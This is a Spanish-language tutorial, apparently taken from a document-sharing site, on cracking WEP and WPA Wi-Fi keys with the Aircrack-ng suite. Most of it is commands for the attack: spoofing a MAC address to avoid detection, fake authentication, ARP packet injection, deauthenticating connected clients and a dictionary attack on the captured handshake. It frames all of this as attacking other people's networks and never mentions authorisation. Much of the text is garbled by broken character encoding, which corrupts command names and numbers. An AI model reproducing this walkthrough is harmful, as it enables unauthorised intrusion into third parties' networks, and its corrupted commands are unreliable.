Sie sind auf Seite 1von 4

TUTORIAL AIRCRACK

CLAVES WEP
Para averiguar si disponemos de una tarjeta inalmbrica en el sistema y cual o cuales son, desde la
consola tecleamos (como usuario root) la siguiente orden:
airmon-ng
Nos devolver las tarjetas (si las hay) que existen en nuestro sistema. a nomenclatura que se usa
para identi!icar la tarjeta inalmbrica suele ser wlan0, wlan1, etc, aunque podemos encontrarnos con eth0 o
ath0.
"upongamos que es wlan0.
#l siguiente paso es deshabilitar la tarjeta para hacerle un cambio de direcci$n %&':
airmon-ng stop (lan)
ifconfig (lan) down
*acemos esto por dos ra+ones importantes:
,. Para que as- no haya problemas de que nos puedan detectar e impedirte !uturas conexiones.
.. Por que vamos a necesitar la direcci$n %&' ms adelante y de esta manera nos resultar ms
!cil de escribir y recordar.
Para cambiar la %&' escribimos la siguiente orden:
macchangr --mac )):,,:..://:00:11 (lan) (esta %&' no es solo un ejemplo sirve per!ectamente)
e acabamos de dar la direcci$n %&' )):,,:..://:00:11
*abilitamos nuevamente la tarjeta inalmbrica poni2ndola en modo monitor:
airmon-ng start (lan)
3bservamos que nos pone el mensaje: 4monitor mode enabled on mon05. #sto quiere decir que el
modo monitor est activado en una inter!a+ de red llamada mon). #s la que vamos a usar de ahora en
adelante.
Para conseguir un listado de redes inalmbricas a nuestro alcance tecleamos:
airod!mp-ng mon)
'onseguimos una lista de las redes inalmbricas, donde se nos dice el BSSID (%&' del router que
da la se6al), PWR (intensidad de se6al), CHN (canal en que se encuentra la red), ENC (es el tipo de
contrase6a que tiene la red, WEP o WPA por ejemplo) y ESSID (nombre de la red inalmbrica).
'uando nos hayamos decidido por la red inalmbrica que vayamos a atacar, pulsamos Ctrl+C para
parar el proceso y con el rat$n seleccionamos todo el BSSID de esa red y lo copiamos.
Para explicar bien esta parte vamos a poner un ejemplo:
7""89: :::;;:<<:==:)):,,
'*N: :
#""89: >&??@#A;)
&hora debemos capturar paquetes de esa red con el siguiente comando:
airod!mp-ng -c : -w prueba --"ssid :::;;:<<:==:)):,, mon)
9onde:
Bc es el nCmero del canal de la red que estamos atacando
B( es el archivo donde se van a guardar los paquetes que capturemos (le hemos dado en este caso
el nombre de prueba)
BBbssid es la %&' del router de la red que estamos atacando
mon) es nuestra tarjeta inalmbrica
&hora que ya estas capturando datos veremos que hay una parte que dice DATA, estos son los
paquetes que llevamos capturados. Para poder desci!rar una WEP son necesarios .).))) paquetes.
"i vemos que va muy lento, esto signi!ica que ninguna persona esta utili+ando la red, es decir, que
no se est generando tr!ico. 9eberemos entonces inyectarle paquetes a la red para generar tr!ico
Primero haremos una !alsa autenticaci$n para que el AP (Acce Point! P"nto de Acceo) no rechace
los paquetes que inyectaremos posteriormente:
airp#a$-ng -% ) -a :::;;:<<:==:)):,, -h )):,,:..://:00:11 - >&??@#A;) mon)
9onde:
B, es el !lag que usa el aireplay para hacer la !alsa autenticaci$n () es el intervalo de tiempo para
cada autenticaci$n)
Ba es el 7""89 de la red que estamos atacando
Bh es la %&' !alsa que le hemos dado a nuestra tarjeta de red inalmbrica
Be es el nombre de la red (#""89) que estamos atacando
9espu2s de 0 l-neas de c$digos, nos dir que la conexi$n esta "cce#"ll, esto signi!ica que
estamos conectados en capa . al router de la red que estamos atacando.
"i por alguna ra+$n no podemos conectar, algunas de las ra+ones pueden ser:
,. a red a la que queremos atacar esta muy lejos
.. Nuestra tarjeta de red no puede hacer inyecci$n de paquetes
/. #l router tiene seguridad para evitar este tipo de ataques
&hora para inyectarle el tra!ico introducimos el siguiente comando:
airp#a$-ng -& -" :::;;:<<:==:)):,, -h )):,,:..://:00:11 mon)
9onde:
B/ es el !lag que usa aireplay para capturar y reenviar la peticiones &DP
Bb es el 7""89 de la red que estamos atacando
Bh es la %&' !alsa que le dimos a nuestra tarjeta de red inalmbrica
"i volvemos a la otra terminal en la que estamos capturando los paquetes nos daremos cuenta que
DATA va cambiando muy rpido. #speraremos a capturar unas ,1).))) peticiones ARP.
&hora abrimos otra consola e introducimos la orden:
aircrac'-ng -( pruebaB),.cap
9onde:
B+ es el !lag que usa aircracE para activar un tipo de cracEeo rpido
pruebaB),.cap es el archivo donde se estn guardando los datos capturados.
9ejemos que el comando se ejecute hasta que nos devuelva el mensaje $E% &'(ND))* #sto
signi!ica que la contrase6a se ha desci!rado, y nos la mostrar de la siguiente !orma:
Fey !ound GHH:HH:HH:HH:HH:HHI
donde las HH son las letras o nCmeros de la contrase6a, por ejemplo: G,.:/0:1::;<:=)I. a contrase6a para
esa red inalmbrica ser-a ,./01:;<=).
istado de los comandos que hemos ejecutado y el orden en que lo hemos hecho:
J airmon-ng
J airmon-ng stop KNuestra8nterLa+9eDedM
J ifconfig KNuestra8nterLa+9eDedM down
J macchangr )mac KNueva%&'M KNuestra8nterLa+9eDedM
J airmon-ng start KNuestra8nterLa+9eDedM
J airod!mp-ng KNuestra8nterLa+9eDedM
J airod!mp-ng -c KNumero9e'analM -w KNombre&rchivo'apturaM )"ssid K7""89atacadaM
KNuestra8nterLa+9eDedM
J airp#a$-ng -% ) -a K7""89atacadaM -h KNuestra%&'M - K#""89atacadaM
KNuestra8nter!a+9eDedM
J airp#a$-ng -& -" K7""89atacadaM -h KNuestra%&'M KNuestra8nter!a+9eDedM
J aircrac'-ng -( KNombre&rchivo'apturaM
Para aquellos que quieren probar otras !ormas de inyecci$n, aqu- les dejo otras dos !ormas que han
!uncionado bien:
Lorma ,:
J airp#a$-ng -% ) -a K7""89atacadaM -h KNuestra%&'M - K#""89atacadaM
KNuestra8nter!a+9eDedM
J airp#a$-ng -* -p )<0, -c LL:LL:LL:LL:LL:LL -h KNuestra%&'M KNuestra8nter!a+9eDedM
Neri!icar si el 7""89 es el que estamos atacando
Lorma .:
J airp#a$-ng -% ) -a K7""89atacadaM -h KNuestra%&'M - K#""89atacadaM
KNuestra8nter!a+9eDedM
J airp#a$-ng -+ -" K7""89atacadaM -h KNuestra%&'M KNuestra8nter!a+9eDedM
ver como se llama el archivo .xor
J pac'tforg-ng -, -a K7""89atacadaM -h KNuestra%&'M -' .11..11..11..11 -l
.11..11..11..11 -$ Karchivo.xorM -w &DP
J airp#a$-ng -* -r &DP KNuestra8nter!a+9eDedM
CLAVES WPA-WPA*
#l m2todo es el mismo que para las claves O#P, hasta que llegamos al momento de capturar
paquetes con el comando:
airod!mp-ng -c : -w prueba --"ssid :::;;:<<:==:)):,, mon)
#n este punto deber-amos esperar a que se capturar el handha+e, que es lo que nos interesa,
pero esto s$lo podr-a ser posible en el momento que un cliente autori+ado se conectara a la red que
queremos atacar. Pero si tenemos la suerte que ya hay un cliente conectado a la red, podr-amos
desautenticarlo, para que volviera a hacer la petici$n al &P y en ese momento capturar el handha+e y
poder obtener la clave de acceso.
"abremos si hay un cliente conectado si en la consola donde tenemos corriendo el airodumpBng,
miramos en la parte de abajo. "i existiera un cliente conectado, nos quedar-amos con su direcci$n %&' y
para desautenticarlo abrir-amos otra consola y ejecutar-amos la orden:
airp#a$-ng --da!th .) -a :::;;:<<:==:)):,, -c K%&'9el'liente9esautenticarM mon)
9onde:
BBdeauth es el !lag usado para indicar el nCmero de veces (en este caso .)) que desautenticaremos
al cliente.
Ba es el 7""89 del &P.
Bc es la direcci$n %&' del cliente que queremos desautenticar
mon) es nuestra inter!a+ de red.
Nolvemos a la consola donde hemos reali+ado la captura con airodump y si hemos tenido 2xito nos
aparecer arriba a la derecha OP& handshaEe %&'.
Pna ve+ tengamos el handshaEe, nos queda el Cltimo paso, el ataque con el diccionario. #sta !orma
de ataque consiste en buscar la contrase6a OP& en un archivo de texto y si coincide la contrase6a con una
palabra del diccionario nos la mostrar. Para ello, desde otra consola, ejecutamos:
aircrac'-ng -a * -w pass(ord.lst prueba.cap
9onde:
B( indica el diccionario a usar (en este caso, ,aword*lt, que es el diccionario que trae aircracE.
Podemos usar nuestro propio diccionario si queremos, s$lo tendremos que indicarle la direcci$n)
"i no nos !unciona con un diccionario, cambiamos de diccionario y lo podemos intentar de nuevo. a
clave es la paciencia, aunque si es una contrase6a segura, lo ms probable es que no est2 en el
diccionario.